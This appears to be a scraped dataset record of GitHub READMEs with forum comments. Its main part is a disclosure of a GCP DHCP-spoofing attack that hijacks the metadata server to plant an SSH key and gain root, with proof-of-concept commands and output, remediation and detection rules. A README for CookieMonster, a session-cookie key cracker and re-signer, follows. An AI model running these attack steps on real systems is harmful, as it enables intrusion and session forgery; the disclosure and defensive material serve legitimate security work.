Probably not a common scenario, but since even the webui of GCP Cloud Console has an option for that, there must be \r\n quite some VMs with this configuration. \r\n In this case the attacker also needs to guess the internal IP address of the VM, but since the first VM seems \r\n to get `10.128.0.2` always, the attack could work, still.\r\n\r\n\r\n\r\n# Proof of concepts\r\n\r\n## Attack #1\r\n\r\nAs described above, you need to run a rogue metadata server running a host with port 80 open from the internet. \r\nI used 35.209.180.239 for this purpose (this is the public IP address of 10.128.0.2, a compute engine box actually), \r\nmeta.py is running here:\r\n\r\n```\r\n\troot@test-instance-1:~/isc-dhcp-client/real3# ./meta.py\r\n\tUsage: ./meta.py id_rsa.pub\r\n\r\n\troot@test-instance-1:~/isc-dhcp-client/real3# ./meta.py id_rsa.pub\r\n```\r\n\r\nMy proof of concept exploits a simplified setup, when the victim box is being rebooted. In this case unixtime\r\nof the dhclient process can be guessed easily.\r\n\r\n```\r\n\troot@test-instance-1:~/isc-dhcp-client/real3# ./takeover-at-reboot.pl\r\n\tUsage: ./takeover-at-reboot.pl victim-ip-address meta-ip-address\r\n```\r\n\r\nThe victim box is `10.128.0.4` here. The public IP address of this host is `34.67.219.89`.\r\nVerifying first we don't have access using the RSA private key that belongs to id_rsa.pub referenced above \r\nfor meta.py:\r\n\r\n```\r\n\troot@builder:/opt/_tmp/dhcp/exploit# ssh -i id_rsa root@34.67.219.89\r\n\tPermission denied (publickey).\r\n```\r\n\r\nThen the attack is started:\r\n\r\n```\r\n\troot@test-instance-1:~/isc-dhcp-client/real3# ./takeover-at-reboot.pl 10.128.0.4 35.209.180.239\r\n\r\n\t10.128.0.4: alive: 1601231808...\r\n```\r\n\r\nThen I type reboot on the victim host (`10.128.0.4`). 
The rest of the output of `takeover-at-reboot.pl`:\r\n\t\r\n```\r\n\t10.128.0.4 seems to be not alive anymore\r\n\tRUN: ip addr show dev ens4 | awk '/inet / {print $2}' | cut -d/ -f1\r\n\tRUN: ip route show default | awk '/via/ {print $3}'\r\n\tNIC: ens4\r\n\tMin pid: 290\r\n\tMax pid: 315\r\n\tMin ts: 1601231808\r\n\tMax ts: 1601231823\r\n\tMy IP: 10.128.0.2\r\n\tRouter: 10.128.0.1\r\n\tTarget IP: 10.128.0.4\r\n\tTarget MAC: 42:01:0a:80:00:04\r\n\tNumber of potential xids: 41\r\n\tInitial OFFER+ACK flood\r\n\tMAC: 42:01:0a:80:00:04\r\n\tSrc IP: 10.128.0.2\r\n\tDst IP: 10.128.0.4\r\n\tNew IP: 35.209.180.239\r\n\tNew hostname: metadata.google.internal\r\n\tNew route:\r\n\tACK: true\r\n\tOffer: true\r\n\tOneshot: false\r\n\tFlooding again to revert the original network config\r\n\tMAC: 42:01:0a:80:00:04\r\n\tSrc IP: 10.128.0.2\r\n\tDst IP: 10.128.0.4\r\n\tNew IP: 10.128.0.4\r\n\tNew hostname:\r\n\tNew route: 10.128.0.1\r\n\tACK: true\r\n\tOffer: false\r\n\tOneshot: false\r\n```\r\n\r\nAfter this point, the output of the screen where meta.py is running is flooded with lines like this:\r\n\r\n```\r\n\t34.67.219.89 - - [27/Sep/2020 18:40:06] \"GET /computeMetadata/v1//?recursive=true&alt=json&wait_for_change=true&timeout_sec=60&last_etag=NONE HTTP/1.1\" 200 -\r\n```\r\n\r\nAt this point, I can login to victim box using the new (attacker controlled) SSH key.\r\n\r\n```\r\n\troot@builder:/opt/_tmp/dhcp/exploit# ssh -i id_rsa root@34.67.219.89\r\n\tLinux metadata 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64\r\n\r\n\tThe programs included with the Debian GNU/Linux system are free software;\r\n\tthe exact distribution terms for each program are described in the\r\n\tindividual files in /usr/share/doc/*/copyright.\r\n\r\n\tDebian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\r\n\tpermitted by applicable law.\r\n\troot@metadata:~# id\r\n\tuid=0(root) gid=0(root) groups=0(root),1000(google-sudoers)\r\n```\r\n\r\nThis was tested using the official Debian 10 images.\r\n\r\n\r\n\r\n\r\n## Attack #2\r\n\r\nTo verify this setup, I built a slightly modified version of dhclient; besides some additional log lines the only important change is the \r\nincreased frequency of lease renewals:\r\n\r\n```\r\n*** dhclient.c.orig 2020-09-29 23:38:16.322296529 +0200\r\n--- dhclient.c 2020-09-29 22:51:11.000000000 +0200\r\n*************** void bind_lease (client)\r\n*** 1573,1578 ****\r\n--- 1573,1580 ----\r\n client->new = NULL;\r\n\r\n /* Set up a timeout to start the renewal process. */\r\n+ client->active->renewal = cur_time + 5; // hack!\r\n+\r\n tv.tv_sec = client->active->renewal;\r\n tv.tv_usec = ((client->active->renewal - cur_tv.tv_sec) > 1) ?\r\n myrandom(\"active renewal\") % 1000000 : cur_tv.tv_usec;\r\n```\r\n\r\n\r\nA 10 minute window consists of ~600 potetial XIDs. I rebooted the victim host (`10.128.0.4`), logged in, ran\r\n`journalctl -f|grep dhclient` to see what is going on. 
Then I executed the `takeover-at-renew.pl` script \r\non the attacker machine (internal ip: `10.128.0.2`, external ip: `35.209.180.239`, a VM on the same subnet):\r\n\r\n```\r\n# ONESHOT_WINDOW_MIN=10 ./takeover-at-renew.pl 10.128.0.4 35.209.180.239\r\n```\r\n\r\nThis resulted the following log lines on the victim machine:\r\n\r\n```\r\nOct 02 07:06:05 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:05 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:05 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:10 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:10 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:11 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:16 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:16 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:16 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:21 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:21 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:21 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:26 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:26 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:26 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:31 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:31 test-instance-2 dhclient[301]: DHCPACK of 35.209.180.239 from 10.128.0.2\r\nOct 02 07:06:32 metadata dhclient[301]: bound to 35.209.180.239 -- renewal in 5 seconds.\r\nOct 02 07:06:37 metadata dhclient[301]: DHCPREQUEST for 35.209.180.239 on ens4 to 35.209.180.239 port 67\r\nOct 02 07:06:44 metadata dhclient[301]: DHCPREQUEST for 35.209.180.239 on ens4 to 35.209.180.239 port 67\r\nOct 02 07:06:46 metadata dhclient[301]: DHCPACK of 10.128.0.4 from 10.128.0.2\r\nOct 02 07:06:47 metadata dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\n```\r\n\r\nThis means the 6th round was successful. With \"normal\" lease renewal (unpatched `dhclient`), the same thing would have \r\ntaken ~3 hours.\r\n\r\nThe attack was indeed successful:\r\n\r\n```\r\nroot@test-instance-2:~# cat /etc/hosts\r\n127.0.0.1 localhost\r\n::1 localhost ip6-localhost ip6-loopback\r\nff02::1 ip6-allnodes\r\nff02::2 ip6-allrouters\r\n\r\n35.209.180.239 metadata.google.internal metadata # Added by Google\r\n169.254.169.254 metadata.google.internal # Added by Google\r\n```\r\n\r\nI repeated the attack and flooded the victim with 3 hours of XIDs (~10000). The 51th DHCPREQUEST was hijacked (would \r\nhave taken a little bit more than a complete day with \"normal\" lease times).\r\nI concluded that the execution time indeed correlates with the number of XIDs. 
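\r\n\r\nTo put that in numbers, a rough, hypothetical Go helper (not part of the PoC) estimates how many candidate XIDs a given boot-time uncertainty window implies and how long one flooding pass over them takes at the ~170.000 packets per second quoted earlier:\r\n\r\n```go\r\npackage main\r\n\r\nimport \"fmt\"\r\n\r\n// Rough feasibility math mirroring the figures in this write-up: the candidate\r\n// seeds (and therefore the precomputed XIDs) grow with the boot-time\r\n// uncertainty window plus the pid spread, and one flooding pass sends one\r\n// packet per candidate XID.\r\nfunc candidateXIDs(windowSeconds, pidSpread int) int {\r\n\treturn windowSeconds + pidSpread\r\n}\r\n\r\nfunc main() {\r\n\tconst pps = 170000.0 // approximate packet rate of a small GCE VM\r\n\tpidSpread := 315 - 290\r\n\tfor _, window := range []int{120, 600, 86400} { // 2 min, 10 min, 1 day\r\n\t\tn := candidateXIDs(window, pidSpread)\r\n\t\tfmt.Printf(\"window %6ds -> ~%6d XIDs -> ~%.2fs per pass\\n\", window, n, float64(n)/pps)\r\n\t}\r\n}\r\n```\r\n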
\r\nThis of course would decrease the success rate in real life setups, but the attack is still feasible.\r\n\r\n\r\n## Attack #3\r\n\r\nA prerequisite of this attack is the GCP firewall to be effectively turned off.\r\n\r\nI found that my DHCP related packets were not forwarded to the VM while the VM is rebooting (probably not after the \r\nlease is returned at reboot), effectively ruling out `takeover-at-discover.pl`.\r\n\r\nI decided to carry out an attack against the lease renewal (effectively the same as #2). My expectation was that it should\r\nstill be feasible.\r\n\r\nI tested this scenario using an AWS VM as the attacker machine and a really short time window (2 minutes).\r\nThe `meta.py` script was still running on the GCP attacker machine (external ip: 35.209.180.239).\r\nI rebooted the victim machine (internal ip: `10.128.0.4`, external ip: `34.122.27.253`), logged in, ran `journalctl -f|grep dhclient`.\r\n\r\nThen on the AWS attacker machine (external ip: `3.136.97.244`), I executed this command:\r\n\r\n```\r\nroot@ip-172-31-25-197:~/real8# NIC=eth0 ONESHOT_WINDOW_MIN=2 FINAL_IP=10.128.0.4 MY_ROUTER=10.128.0.1 ./takeover-at-renew.pl 34.122.27.253 35.209.180.239\r\nFlooding destination between with XIDs between 1601651865 and 1601651984\r\nRUN: ip addr show dev eth0 | awk '/inet / {print $2}' | cut -d/ -f1\r\nRUN: /root/real8/randr 10.128.0.4 290 315 1601651865 1601651984 2>/dev/null | paste -sd ',' - >/tmp/xids.txt\r\nNIC: eth0\r\nMin pid: 290\r\nMax pid: 315\r\nMin ts: 1601651865\r\nMax ts: 1601651984\r\nAttacker IP: 172.31.25.197\r\nRouter: 10.128.0.1\r\nTarget IP (initial phase): 34.122.27.253\r\nTarget MAC: 42:01:0a:80:00:04\r\nTarget IP (final phase): 10.128.0.4\r\n34.122.27.253 is alive\r\nStart flooding the victim for 1801 sec\r\nAnd monitoring it in the background\r\nRunning for 1801 sec in the background: /root/real8/flood -ack -lease 15 -dev eth0 -dstip 34.122.27.253 -newhost metadata.google.internal -newip 35.209.180.239 -srcip 172.31.25.197 -mac 42:01:0a:80:00:04 -xidfile /tmp/xids.txt\r\nMAC: 42:01:0a:80:00:04\r\nSrc IP: 172.31.25.197\r\nDst IP: 34.122.27.253\r\nNew IP: 35.209.180.239\r\nNew hostname: metadata.google.internal\r\nNew route:\r\nACK: true\r\nOffer: false\r\nOneshot: false\r\nNumber of XIDs: 145\r\nThe host is down, it probably swallowed the poison ivy!\r\nAnd now some flood again to revert connectivity\r\nit seems the attack was successful\r\nroot@ip-172-31-25-197:~/real8# Running for 12 sec in the background: /root/real8/flood -ack -ack -lease 1800 -dev eth0 -dstip 34.122.27.253 -newip 10.128.0.4 -route 10.128.0.1 -srcip 172.31.25.197 -mac 42:01:0a:80:00:04 -xidfile /tmp/xids.txt\r\nMAC: 42:01:0a:80:00:04\r\nSrc IP: 172.31.25.197\r\nDst IP: 34.122.27.253\r\nNew IP: 10.128.0.4\r\nNew hostname:\r\nNew route: 10.128.0.1\r\nACK: true\r\nOffer: false\r\nOneshot: false\r\nNumber of XIDs: 145\r\n```\r\n\r\nThis was running for a while and finally succeeded at the 21th DHCPREQUEST. 
With normal lease times this would have taken ~11 hours.\r\nThe metadata server was taken over successfully:\r\n\r\n```\r\nOct 02 15:21:30 test-instance-2 dhclient[301]: DHCPACK of 35.209.180.239 from 3.136.97.244\r\nOct 02 15:21:30 metadata dhclient[301]: bound to 35.209.180.239 -- renewal in 5 seconds.\r\n```\r\n\r\nThe host file was modified according to the expectations:\r\n\r\n```\r\nroot@test-instance-2:~# cat /etc/hosts\r\n127.0.0.1 localhost\r\n::1 localhost ip6-localhost ip6-loopback\r\nff02::1 ip6-allnodes\r\nff02::2 ip6-allrouters\r\n\r\n35.209.180.239 metadata.google.internal metadata # Added by Google\r\n169.254.169.254 metadata.google.internal # Added by Google\r\n```\r\n\r\nAnd also got some connections from the osconfig agent (the kept-alive connection of the guest agent probably survived the network change)\r\n\r\n```\r\n34.122.27.253 - - [02/Oct/2020 15:29:09] \"PUT /computeMetadata/v1/instance/guest-attributes/guestInventory/Hostname HTTP/1.1\" 501 -\r\n```\r\n\r\nWhen I repeated this attack (2 minute XID window still), the 5th round was successful (2.5 hours with normal leases).\r\n\r\n\r\nConclusion about attack #2 and #3: not the most reliable thing on earth, but definetely possible. I think if I kept the victim host down\r\nlonger than the TCP read timeout of google_guest_agent, then the existing metadata server connection would be interrupted, then \r\nwhile reinitiating the connection after the network connectivity was restored, it would hit the fake metadata server.\r\n\r\n\r\n\r\n# Remediation\r\n\r\n- Get in touch with ISC. They really need to improve the srandom setup. Maybe get a new feature added that drops packets by \r\n non-legitimate DHCP servers (so you could rely on this as an additional security measure).\r\n- Even if ISC has improved their software, it won't be upgraded on most of your VMs. Analyze your firewall logs to learn \r\n if you have any clients that rely on these ports for any legitimate reasons.\r\n Block udp/68 between VMs, so that only the metadata server could could carry out DHCP.\r\n- Stop using the Metadata server via this virtual hostname (metadata.google.internal). At least in your official agents.\r\n- Stop managing the virtual hostname (metadata.google.internal) via DHCP. The IP address is documented to be stable anyway.\r\n- Secure the communication with the Metadata server by using TLS, at least in your official agents.\r\n\r\nNote, using a random generated MAC address wouldn't prevent mounting the attack on the same subnet.\r\n\r\n# FAQ\r\n\r\n** - The issue seems generic. Are other cloud providers affected as well? **\r\n\r\n- I checked only the major ones, they were not affected (at least at the time of checking) due to another factors \r\n (e.g. not using DHCP by default).\r\n\r\n** - If Google doesn't fix this, what can I do? **\r\n\r\n- Google usually closes bug reports with status \"Unfeasible\" when the efforts required to fix outweigh the risk. \r\n This is not the case here. 
I think there is some technical complexity in the background, which doesn't allow\r\n them deploying a network level protection measure easily.\r\n Until the fix arrives, consider one of the followings:\r\n - don't use DHCP\r\n - setup a host level firewall rule to ensure the DHCP communication comes from the metadata server (169.254.169.254)\r\n - setup a GCP/VPC/Firewall rule blocking udp/68 as is (all source, all destination) [more info](https://github.com/irsl/gcp-dhcp-takeover-code-exec/issues/4#issuecomment-872145234)\r\n\r\nGoogle's official guidance to block untrusted internal traffic to exploit this flaw:\r\n\r\n---\r\n> To block incoming traffic over UDP port 68, adjust the following gCloud command syntax for your environment:\r\n> \r\n> ```\r\n> gcloud --project= compute firewall-rules create block-dhcp --action=DENY --rules=udp:68 --network= --priority=100\r\n> ```\r\n> \r\n> * The above command will create a firewall rule named `\"block-dhcp\"` in the specified project and VPC that will block all inbound traffic over UDP port 68 \r\n> * Setting the priority to `100` gives the rule a high priority, but other values can be used. We recommend setting this value [as low as possible](https://cloud.google.com/vpc/docs/firewalls#priority_order_for_firewall_rules) to prevent other rules from superseding it \r\n> * The command will need to be executed for each VPC you wish to block DHCP on by replacing `` with the respective VPC\r\n> * Note that firewall rule names cannot be reused within the same project; multiple rules for different VPCs in a project will need to have different names (`block-dhcp2`, `block-dhcp-vpcname`, etc)\r\n> * Additional information on configuring firewall rules can be in Google Cloud documentation [here](https://cloud.google.com/vpc/docs/using-firewalls).\r\n---\r\n\r\n** - How to detect this attack? **\r\n\r\nDHCP renewal usually yields only a few packets every 30 minutes (per host). This attack requires sending a flood of\r\nDHCP packets (hundreds of thousands of packets per second). Setting a rate limiter could probably detect or prevent\r\nthe attack:\r\n\r\n```\r\niptables -A INPUT -p udp --dport 68 -m state --state NEW -m recent --set\r\niptables -A INPUT -p udp --dport 68 -m state --state NEW -m recent --update --seconds 1 --hitcount 10 -j LOG --log-prefix \"DHCP attack detected \"\r\n```\r\n\r\n** - What is the internal ID of this bug in Google's bug tracker? **\r\n\r\nhttps://issuetracker.google.com/issues/169519201\r\n\r\n** - Is this a vulnerability of ISC dhclient? **\r\n\r\nWhile a PRNG with more entropy sources could have prevented this flaw being exploitable in GCP, I still think this is not \r\na vulnerability of their implementation for the following two reasons:\r\n- DHCP XIDs are public (broadcasted on the same LAN) anyway\r\n- with regular IP/MAC setups (=where they are not predictable/static) and udp/68 exposed, not even the current \"weak\" PRNG \r\n would be practically exploitable\r\n\r\nNote: in the meanwhile, Google has identified an [additional attack vector](https://gitlab.isc.org/isc-projects/dhcp/-/issues/197)\r\ngaining an MitM position for a local threat actor.\r\n\r\n\r\n# Timeline\r\n\r\n* 2020-09-26: Issue identified, attack #1 validated\r\n* 2020-09-27: Reported to Google VRP\r\n* 2020-09-29: VRP triage is complete \"looking into it\"\r\n* 2020-10-02: Further details shared about attack #2 and #3\r\n* 2020-10-07: Accepted, \"Nice catch\"\r\n* 2020-12-02: Update requested about the estimated time of fix\r\n* 2020-12-03: ... 
\"holiday season coming up\"\r\n* 2021-06-07: Asked Google if a fix is coming in a reasonable time, as I'm planning to publish an advisory\r\n* 2021-06-08: Standard response \"we ask for a reasonable advance notice.\"\r\n* 2021-06-25: Public disclosure\r\n* 2021-07-30: \"Our systems show that all the bugs we created based on your report have been fixed by the product team.\"\r\n\r\n# Credits\r\n\r\n[Imre Rad](https://www.linkedin.com/in/imre-rad-2358749b/)\r\n", "readme_type": "markdown", "hn_comments": "This is well worth reading. It describes how, through a series of well meaning steps, you shoot yourself in the face.It all starts with:\"Note that the last 4 bytes (0a:80:00:02) of the MAC address (42:01:0a:80:00:02) are actually the same as the internal IP address of the box (10.128.0.2). This means, 1 of the 3 components is effectively public.\"It's so strange to me that they have a process for adding a root key that involves no authentication at all. These are VMs with their images running their pre-installed software, it's not like this would have been a hard problem.Communist data is public property.If I understand correctly, the attack can be mitigated with the appropriate level of firewall rules. Both ingress and egress traffic should be blocked by default and selectively allowed based on need. In this case, DHCP traffic would only be allowed to 169.254.169.254.You still have somebody in your network though, so there's that.Has it been verified that GCE is still vulnerable?There's clearly a communication gap between the researcher and Google. But perhaps the techies at Google saw it and fixed it and it just hasn't been communicated, or some other change in GCE has closed it or mitigated it?While it certainly seems like a fairly serious vulnerability I think it's worth highlighting that this attack requires that either you already have access to a machine on the same subnet as the target machine or that the firewall in front of the target machine is very lax. That's a pretty high bar for getting the attack to work in the wild.Same subnet = as another VM in your project? or random GCP VM that happens to share your subnet? Seems like pretty different risk levels...https://github.com/irsl/gcp-dhcp-takeover-code-exec#attack-s...testVery creative approach, never thought of such an attack vector.This attack allows an adversary to move from root permissions on one VM in a GCP project to gaining root permissions on another VM in the same project.The attack is unlikely to succeed unless the attacker knows the exact time a particular VM was last rebooted, or can cause a reboot.Overall, this attack alone probably won't be the reason you will have to start filling in a GDPR notification to your users...Apparently Google Project Zero timeline only applies to others...> any security-conscious GCP customersDoes that exist? In my book, if you're security conscious, you can only do self-hosting whether on premises or in your own bay in a datacenter.Giving away your entire computing and networking to a third party such as Google is orthogonal to security.While there are a series of vulnerabilities here, none of them would be exploitable in this way if the metadata server was accessed via an IP instead of the hostname metadata.google.internal.The metadata server is documented to be at 169.254.169.25, always[1]. But Google software (agents and libraries on VMs) resolves it by looking up metadata.google.internal. 
If metadata.google.internal isn't in /etc/hosts, as can be the case in containers, this can result in actual DNS lookups over the network to get an address that should be known.AWS uses the same address for their metadata server, but accesses via the IP address and not some hostname[2].I've seen Google managed DNS servers (in GKE clusters) fall over under the load of Google libraries querying for the metadata address[3]. I'm guessing Google wants to maintain some flexibility, which is why they are using a hostname, but there are tradeoffs.[1] https://cloud.google.com/compute/docs/internal-dns[2] https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance...[3] This is easily solvable with Kubernetes HostAliases that write /etc/hosts in the containers.Why the hell isn't the metadata server authenticated, e.g. via TLS certificates?So why isn't the metadata server authenticated?It would seem simple enough for googles metadata server to have a valid HTTPS certificate and be hosted on a non-internal domain. Or use an internal domain, but make pre-built images use a custom CA.Or Google could make a 'trusted network device', rather like a VPN, which routes traffic for 169.254.169.254 (the metadata server IP address) and add metadata.google.internal to the hosts file as 169.254.169.254.The combination of dhcp, magic metadata servers, and cloud-init feels so awkward way of managing VM provisioning. I'm thinking would having a proper virtual device or maybe something on uefi layer clean up things?There's a really simple (albeit hacky) workaround which can be deployed fairly quickly. In /etc/dhcp/dhclient-exit-hooks.d/google_set_hostname replace this line:if [ -n \"$new_host_name\" ] && [ -n \"$new_ip_address\" ]; thenwith this:if [ -n \"$new_host_name\" -a ! \"$new_host_name\" =~ metadata.google.internal ] && [ -n \"$new_ip_address\" ]; then(Yes, =~ is a bashism, but google_set_hostname is a bash script.)This prevents /etc/hosts from getting poisoned with a bogus entry for the metadata server. Of course, dhcpd should also be fixed to use a better random number generator, and the firewall should be default stop dhcp packets from any IP address other than Google's DHCP server. Belt and suspenders, after all. But fixing the dhclient exit hooks is a simple text edit.The more concerning security finding here is that Google sat on this for 9 months. Assuming the claims hold, this is a serious problem for any security-conscious GCP customers. What other vulnerabilities are they sitting on? Do they have processes in place to promptly handle new ones? Doesn\u2019t look like it\u2026", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "iangcarroll/cookiemonster", "link": "https://github.com/iangcarroll/cookiemonster", "tags": [], "stars": 519, "description": "\ud83c\udf6a CookieMonster helps you detect and abuse vulnerable implementations of stateless sessions.", "lang": "Go", "repo_lang": "", "readme": "# :cookie: CookieMonster\nCookieMonster is a command-line tool and API for decoding and modifying vulnerable session cookies from several different frameworks. It is designed to run in automation pipelines which must be able to efficiently process a large amount of these cookies to quickly discover vulnerabilities. Additionally, CookieMonster is extensible and can easily support new cookie formats.\n\nIt's worth emphasizing that CookieMonster finds vulnerabilities in users of frameworks, usually not in the frameworks themselves. 
These users can resolve vulnerabilities found via CookieMonster by configuring the framework to use a strong secret key.\n\n## Features\n* Decodes and unsigns session cookies from Laravel, Django, Flask, Rack, and Express, and also handles raw JWTs.\n* Rapidly evaluates cookies; ignores invalid and unsupported cookies, and quickly tests those that it can.\n* Takes full advantage of Go's fast, native implementations for hash functions.\n* Intelligently decodes URL-encoded and Base64-encoded cookies (i.e. the Base64 of a JWT) when the initial decoding fails.\n* Supports many algorithms for HMAC-based decoders, even if the framework typically only uses one.\n* Flexible base64-encoded wordlist format allows any sequence of bytes key to be added as an entry; ships with a reasonable default list.\n\n| Framework | Supported | Notes |\n|-------------------------|-----------|----------------------------------------------------------|\n| JSON Web Tokens | \u2705 | HS256, HS384, HS512 |\n| Django | \u2705 | Common algorithms |\n| Flask | \u2705 | Common algorithms |\n| Rack | \u2705 | Common algorithms |\n| Express (cookie-signer) | \u2705 | Common algorithms |\n| Laravel | \u2705 | AES-CBC-128/256 (GCM not yet supported) |\n| itsdangerous | \u2705 | URLSafeSerializer/URLSafeTimedSerializer (default salt) |\n| Others | \u274c | Not yet! |\n\n## Getting Started\nTo install CookieMonster, install Go and then install the CLI:\n\n```bash\ngo install github.com/iangcarroll/cookiemonster/cmd/cookiemonster@latest\n```\n\nCookieMonster only needs two essentials: a cookie to try and unsign, and a wordlist to use. If you don't have a wordlist, CookieMonster ships with a default wordlist from the [Flask-Unsign](https://github.com/Paradoxis/Flask-Unsign) project. CookieMonster wordlists are a bit different; each line must be encoded with base64. This is because Python projects are especially liberal with inserting garbage bytes into these keys, and we need to be able to properly handle them.\n\nAn example of using the CLI with a static cookie, or with a URL:\n\n```bash\n% ./cookiemonster -cookie \"gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1mgnkC:z5yDxzI06qYVAU3bkLaWYpADT4I\"\n\ud83c\udf6a CookieMonster 1.3.0\n\u2139\ufe0f CookieMonster loaded the default wordlist; it has 38919 entries.\n\u2705 Success! I discovered the key for this cookie with the django decoder; it is \"changeme\".\n\n% ./cookiemonster -url \"https://httpbingo.org/cookies/set?abc=gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1mgnkC:z5yDxzI06qYVAU3bkLaWYpADT4I\"\n\ud83c\udf6a CookieMonster 1.3.0\n\u26a0\ufe0f I got a non-200 status code from this URL; it was 302.\n\u2139\ufe0f CookieMonster loaded the default wordlist; it has 38919 entries.\n\u2705 Success! I discovered the key for this cookie with the django decoder; it is \"changeme\".\n```\n\n## Express support\nCookieMonster is capable of supporting cookies signed with `cookie-session`, which is common with Express. However, it does several strange things that require care in order to use this tool. A common response from a `cookie-session` application looks like this:\n\n```http\nset-cookie: session=eyJhbmltYWxzIjoibGlvbiJ9\nset-cookie: session.sig=Vf2INocdJIqKWVfYGhXwPhQZNFI\n```\n\nIn order to pass this into CookieMonster, you must include both the cookie name and the signature cookie. 
In this example, you would call CookieMonster like this: `cookiemonster -cookie session=eyJhbmltYWxzIjoibGlvbiJ9^Vf2INocdJIqKWVfYGhXwPhQZNFI` (note the delimiting `^` and the prefixed cookie name). The API accepts this same format in `monster.NewCookie`.\n\n## Resigning support\nCookieMonster has limited support for resigning a cookie once it has been unsigned, with the `-resign` flag. This involves modifying the body of the cookie to match your input, and then re-computing the signature with the key we discovered. Currently, you can do this for Django-decoded cookies; ensure you pass the original cookie to `-cookie`, and pass `-resign` an unencoded string of text you'd like to be inside the cookie. CookieMonster will correctly encode your input and then resign the cookie.\n\n## API usage\nCookieMonster exposes `pkg/monster`, which allows other applications to easily take advantage of it. This is much more performant than booting the CLI if you are testing many cookies. An example usage of it is below.\n\n```go\nimport (\n \"github.com/iangcarroll/cookiemonster/pkg/monster\"\n)\n\nvar (\n\t//go:embed wordlists/my-wordlist.txt\n\tmonsterWordlist string\n\n\twl = monster.NewWordlist()\n)\n\nfunc init() {\n\tif err := wl.LoadFromString(monsterWordlist); err != nil {\n panic(err)\n }\n}\n\nfunc MonsterRun(cookie string) (success bool, err error) {\n\tc := monster.NewCookie(cookie)\n\n\tif !c.Decode() {\n\t\treturn false, errors.New(\"could not decode\")\n\t}\n\n\tif _, success := c.Unsign(wl, 100); !success {\n\t\treturn false, errors.New(\"could not unsign\")\n\t}\n\n\treturn true, nil\n}\n```\n\n\n## Credits\nCookieMonster is built with inspiration from several sources, and ships with the excellent Flask-Unsign wordlists.\n\n* https://github.com/Paradoxis/Flask-Unsign\n* https://github.com/nicksanders/rust-django-signing", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "shimberger/gohls", "link": "https://github.com/shimberger/gohls", "tags": ["hls", "ffmpeg", "golang", "react", "video-stream", "videojs", "hacktoberfest"], "stars": 519, "description": "A server that exposes a directory for video streaming via web interface", "lang": "Go", "repo_lang": "", "readme": "# Golang HLS Streamer\n\n[![CircleCI](https://circleci.com/gh/shimberger/gohls/tree/master.svg?style=svg)](https://circleci.com/gh/shimberger/gohls/tree/master) \n[![GoDoc](https://godoc.org/github.com/shimberger/gohls?status.svg)](https://godoc.org/github.com/shimberger/gohls) \n\nSimple server that exposes a directory for video streaming via HTTP Live Streaming (HLS). Uses ffmpeg for transcoding.\n\n*This project is cobbled together from all kinds of code I had lying around so it's pretty crappy all around. It also has some serious shortcomings.*\n\n## Running it\n\n*Important*: You need the ffmpeg and ffprobe binaries in your PATH. The server will not start without them. You can find builds most operating systems at [https://ffmpeg.org/download.html](https://ffmpeg.org/download.html).\n\n### 1. 
Download the binary for your operating system\n\nYou can find the latest release on the releases page [https://github.com/shimberger/gohls/releases](https://github.com/shimberger/gohls/releases) or just download a current snapshot:\n\n- [Windows (64 bit)](https://s3.amazonaws.com/gohls/gohls-windows-amd64-snapshot.tar.gz)\n- [Linux (64 bit)](https://s3.amazonaws.com/gohls/gohls-linux-amd64-snapshot.tar.gz)\n- [macOS (64 bit)](https://s3.amazonaws.com/gohls/gohls-osx-snapshot.tar.gz)\n\n### 2. Create a configuration file\n\nThe configuration is stored in JSON format. Just call the file `gohls-config.json` or whatever you like. The format is as follows:\n\n```\n{\n\t\"folders\": [\n\t\t{\n\t\t\t\"path\": \"~/Videos\",\n\t\t\t\"title\": \"My Videos\"\n\t\t},\n\t\t{\n\t\t\t\"path\": \"~/Downloads\",\n\t\t\t\"title\": \"My Downloads\"\n\t\t}\n\t]\n}\n```\n\nThis will configure which directories on your system will be made available for streaming. See the screenshot for details:\n\n![](https://s3-eu-west-1.amazonaws.com/captured-krxvuizy1557lsmzs8mvzdj4/yd4ei-20181024-24215053.png)\n\n### 3. Run the server\n\nExecute the command `gohls serve -config ` e.g. `gohls serve -config gohls-config.json` to serve the videos specified by the config file. To make the server listen on another port or address just use the `serve` command with `--listen` like so (the example uses port 7000 on all interfaces): `gohls serve --listen :7000 -config `\n\n### 4. Open a web browser\n\nVisit the 